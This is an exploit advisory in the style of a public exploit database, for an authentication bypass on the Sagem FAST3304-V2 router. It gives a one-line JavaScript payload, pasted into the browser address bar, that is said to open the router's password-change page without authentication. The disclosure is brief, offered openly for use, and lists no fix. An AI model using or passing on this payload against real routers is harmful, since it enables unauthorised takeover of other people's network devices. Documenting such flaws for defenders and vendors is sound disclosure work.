Sagem FAST3304-V2 - Authentication Bypass

2015-10-28 00:05:57

================================================================================
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/
| | |___ |___ | | | | | | | \_ |__] | | | \

================================================================================


######################################################
# Exploit Title: Sagem javascript injection
# Date: 27/10/15
# Exploit Author: Soufiane Alami Hassani
# Version: FAST3304-V2
# Tested on: [Windows 8.1 Pro]
# Category : webapps
# Facebook : soufiane.a.hassani
# Email : [email protected]
######################################################


###########################
#By Soufiane Alami Hassani#
###########################

Vulnerability Description : You can change the password of your router even if you have not the access.

Exploit : In Bar address copy and paste : "javascript:mimic_button('goto: 9096..')" the router redirect you to another page to change the password .

########################
Moroccan Are The Best .
########################


mimic_button('goto: 9096..')

Fixes

No fixes

In order to submit a new fix you need to be registered.